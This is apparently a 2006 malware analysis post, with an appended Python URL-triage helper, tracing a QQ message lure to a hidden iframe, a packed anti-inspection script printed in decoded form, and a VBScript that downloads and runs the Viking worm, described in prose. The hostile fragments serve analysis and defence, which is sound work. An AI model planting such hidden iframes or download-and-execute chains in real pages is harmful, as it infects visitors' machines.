Endurer original
2006-10-08, 1st version
The information automatically sent by QQ is:
/--------
Check out my recent photos ~~~ To scan the Q-zone space. Is it too explicit ....
Hxxp: // Q-zone. *** QQ. c0m. % 34% 76% 30 *** % 2e % 63% 6e/** Photo/cgi_bin & 387 ** 381/
--------/
The head of the web page opened by this link contains JavaScript code encrypted with the custom function psw. After decryption:
/--------
<IFRAME src = hxxp: // web *** 1.39 *** com.org/m??#s/mm=##.htm width = 0 Height = 0> </iframe>
--------/
The head of MM***.htm is a script program encrypted with HTMLShip, divided into two parts:
The first part is written in JavaScript. The decrypted code is as follows:
/--------
<SCRIPT language=JavaScript>
ys6=5633;
// Block the context menu (IE branch re-arms the handler every 800 ms)
if(document.all){function _DM(){return false};function _MDM(){document.oncontextmenu=_DM;setTimeout("_MDM()",800)};_MDM();}
document.oncontextmenu=new Function("return false");
// Swallow non-left mouse buttons in Netscape/Mozilla
function _NDM(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};
if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_NDM;}else{document.onmouseup=_NDM;};
ok74=3345;di39=7346;
// Overwrite the status bar every 100 ms
function _DWS(){window.status="the page is protected by htmlship XP";setTimeout("_DWS()",100);};_DWS();
ky53=6773;jq9=4206;
// Block text selection (IE branch re-arms the handler every 700 ms)
function _DDS(){if(document.all){document.onselectstart=function(){return false};setTimeout("_DDS()",700)}};_DDS();
// Junk assignments left by the packer
ID69=5348;kh81=489;as87=3348;my34=4488;ll93=5630;bi58=9632;st64=2490;_licensed_to_="team";
</SCRIPT> <HTML>
--------/
The second part is written in VBScript. It uses ADODB.Stream, Microsoft.XMLHTTP and Scripting.FileSystemObject to save hxxp: // web *** 1.3 *** 9com.org/m?##s/mm=##1.exe as %Temp%/g0ld.com, and then runs it with the ShellExecute method of the Shell.Application object.
Kaspersky reports it as Worm.Win32.Viking.Y (http://www.viruslist.com/en/find?words=Worm.Win32.Viking.Y)
Rising reports it as Worm.Viking.CX.
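The lure link at the top of this post puts "QQ.c0m" labels in front of a host name whose real ending is percent-encoded (%2e%63%6e decodes to ".cn"). The following triage helper is an added example, not code from the original post: it decodes the host and reports those traits. The sample URL, the `BRANDS` table and the last-two-labels rule for the registrable domain are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: brand label -> the only registrable domain it legitimately uses.
BRANDS = {"qq": "qq.com"}
TLD_LIKE = {"com", "net", "org", "cn"}
DIGIT_SWAPS = str.maketrans("01", "ol")   # c0m -> com, 1 -> l

# Constructed sample shaped like the lure above; the real host is a reserved .test name.
LURE = "hxxp://q-zone.qq.c0m.%65xample%2etest/photo/cgi_bin"


def analyze_lure_url(url):
    """Return (decoded_host, sorted findings) for one possibly defanged URL."""
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.I)   # refang scheme
    raw_host = urlsplit(url).hostname or ""
    host = unquote(raw_host).lower().rstrip(".")
    labels = host.split(".")
    # Naive registrable domain: last two labels (no public-suffix list here).
    registrable = ".".join(labels[-2:])
    findings = set()
    # Legitimate links have no reason to percent-encode host characters.
    if "%" in raw_host:
        findings.add("percent-encoded-host")
    # A non-final label that only looks like a TLD after digit substitution.
    for label in labels[:-1]:
        normalized = label.translate(DIGIT_SWAPS)
        if normalized != label and normalized in TLD_LIKE:
            findings.add("fake-tld-label:" + label)
    # Brand name present, but only as a subdomain of someone else's domain.
    for brand, legit in BRANDS.items():
        if brand in labels and registrable != legit:
            findings.add("brand-in-subdomain:" + brand)
    return host, sorted(findings)


if __name__ == "__main__":
    for candidate in (LURE, "http://user.qzone.qq.com/123"):
        print(candidate, "->", analyze_lure_url(candidate))
```
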